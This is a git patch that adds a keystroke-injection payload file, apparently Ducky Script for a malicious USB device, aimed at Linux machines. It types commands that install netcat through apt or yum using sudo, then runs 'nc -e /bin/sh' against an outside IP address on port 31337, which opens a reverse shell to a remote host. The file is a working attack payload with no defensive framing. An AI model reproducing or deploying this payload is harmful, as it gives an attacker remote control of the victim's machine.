From 591fd2d2397ca691e87a9622f3dc11dd08ff78dc Mon Sep 17 00:00:00 2001 From: Denis Zheleztsov Date: Thu, 22 Aug 2024 11:10:58 +0300 Subject: [PATCH] Add linux --- linux.txt | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 linux.txt diff --git a/linux.txt b/linux.txt new file mode 100644 index 0000000..bbc983f --- /dev/null +++ b/linux.txt @@ -0,0 +1,9 @@ +DELAY 1500 +GUI r +DELAY 500 + +STRING [[ which apt ]] && sudo apt install -y netcat-openbsd +DELAY 100 +STRING [[ which yum ]] && sudo yum install -y netcat +DELAY +STRING nc -e /bin/sh 45.92.178.34 31337